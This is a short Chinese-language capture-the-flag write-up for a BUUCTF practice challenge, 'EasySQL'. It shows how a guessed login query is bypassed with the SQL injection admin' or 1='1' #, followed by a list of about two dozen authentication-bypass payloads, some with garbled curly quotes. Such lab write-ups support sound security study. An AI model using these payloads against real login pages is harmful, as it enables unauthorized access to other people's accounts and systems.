题目来源:BUFFCTF - [极客大挑战 2019] EasySQL 1
思路的是简单的SQL万能密码的使用!
解题:
构造:admin’ or 1=‘1’ #
解题思路
首先输入:1’;
使得基本可以判断出内部的sql语句为:
select * from user where username=$_GET[‘username’] and password= $_GET[‘password’]
输入:1’;
将语句变换为:select * from user where username = ‘1’; and passeord=‘123’’
构造语句:admin’ or 1=‘1’ #
sql语句变为: select * from user where username = ‘admin’ or 1= ‘1’ # and passeord = ‘123’
#会过滤后面的字符串,相关的还有 – 可以依次尝试
使得ql语句变为:select * from user where username = ‘admin’ or 1= ‘1’
登录成功
相关资料
’ or 1=‘1’ #
'or 1=1/*
'or 1=1–
'or 1=1/*
‘or’ ‘1’=‘1’
‘or’’ =’
‘or’’ =’‘or’’=’
‘or’ =‘1’
‘or’ =‘or’
'or.‘a.’='a
1’ or’1’='1
a’ or’1=1–
or ‘a’=‘a’
or 1=1–
'or 1=1/*
"or “a”="a
“or 1=1–
“or”=”
“or” ="a’='a
“or 1=1–
“or =or”
'‘or’ =‘or’
') or (‘a’='a
‘.).or.(’.a.’=’.a
'or 1=1
‘or”="a’='a